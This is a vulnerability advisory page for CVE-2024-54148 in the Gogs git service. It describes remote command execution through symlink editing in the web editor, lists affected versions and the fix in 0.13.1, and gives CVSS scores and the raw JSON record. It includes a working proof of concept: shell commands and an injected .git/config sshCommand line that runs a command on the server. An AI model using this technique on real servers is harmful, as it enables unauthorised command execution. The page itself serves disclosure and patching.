GHSA-R7J8-5H9C-F6FX

Vulnerability from github – Published: 2024-12-23 17:53 – Updated: 2025-04-10 22:56
VLAI?
Summary
Remote Command Execution in file editing in gogs
Details

Impact

The malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server.

Patches

Editing symlink while changing the file name has been prohibited via the repository web editor (https://github.com/gogs/gogs/pull/7857). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.

Workarounds

No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.

References

n/a

Proof of Concept

  1. Create two repositories, upload something to the first repository, edit any file, and save it on the webpage.

  2. In the second repository, create a symbolic link to the file you need to edit: bash $ ln -s /data/gogs/data/tmp/local-repo/1/.git/config test $ ls -la total 8 drwxr-xr-x   5 dd  staff  160 Oct 27 19:09 . drwxr-xr-x   4 dd  staff  128 Oct 27 19:06 .. drwxr-xr-x  12 dd  staff  384 Oct 27 19:09 .git -rw-r--r--   1 dd  staff   12 Oct 27 19:06 README.md lrwxr-xr-x   1 dd  staff   44 Oct 27 19:09 test -> /data/gogs/data/tmp/local-repo/1/.git/config $ git add . $ git commit -m 'ddd' $ git push -f

  3. Go back to the webpage, edit the symbolic file in the second repository, with the following content, change the filename, and save (here you can notice, with filename changed the symbolic file edit limit is bypassed) [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = echo pwnned > /tmp/poc [remote "origin"] url = [git@github.com](mailto:git@github.com):torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master

  4. Go back to the first repo, edit something, and commit again, you can notice a file called /tmp/poc created on the server.

For more information

If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.

Severity ?
9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.13.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-54148"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-12-23T17:53:01Z",
    "nvd_published_at": "2024-12-23T16:15:07Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server. \n\n### Patches\n\nEditing symlink while changing the file name has been prohibited via the repository web editor (https://github.com/gogs/gogs/pull/7857). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.\n\n### Workarounds\n\nNo viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.\n\n### References\n\nn/a\n\n### Proof of Concept\n\n1. Create two repositories, upload something to the first repository, edit any file, and save it on the webpage.\n2. In the second repository, create a symbolic link to the file you need to edit:\n    ```bash\n    $ ln -s /data/gogs/data/tmp/local-repo/1/.git/config test\n    $ ls -la\n    total 8\n    drwxr-xr-x \u00a0 5 dd \u00a0staff \u00a0160 Oct 27 19:09 .\n    drwxr-xr-x \u00a0 4 dd \u00a0staff \u00a0128 Oct 27 19:06 ..\n    drwxr-xr-x \u00a012 dd \u00a0staff \u00a0384 Oct 27 19:09 .git\n    -rw-r--r-- \u00a0 1 dd \u00a0staff \u00a0 12 Oct 27 19:06 README.md\n    lrwxr-xr-x \u00a0 1 dd \u00a0staff \u00a0 44 Oct 27 19:09 test -\u003e /data/gogs/data/tmp/local-repo/1/.git/config\n    $ git add .\n    $ git commit -m \u0027ddd\u0027\n    $ git push -f\n    ```\n\n3. Go back to the webpage, edit the symbolic file in the second repository, with the following content, change the filename, and save (here you can notice, with filename changed the symbolic file edit limit is bypassed)\n    ```\n    [core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = echo pwnned \u003e /tmp/poc\n    [remote \"origin\"]\n    url = [git@github.com](mailto:git@github.com):torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n    [branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n    ```\n\n4. Go back to the first repo, edit something, and commit again, you can notice a file called `/tmp/poc` created on the server.\n\n### For more information\nIf you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.",
  "id": "GHSA-r7j8-5h9c-f6fx",
  "modified": "2025-04-10T22:56:15Z",
  "published": "2024-12-23T17:53:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-r7j8-5h9c-f6fx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54148"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/issues/7582"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/7857"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/c94baec9ca923f38c19f0c7c5af722b9ec04022a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Remote Command Execution in file editing in gogs"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.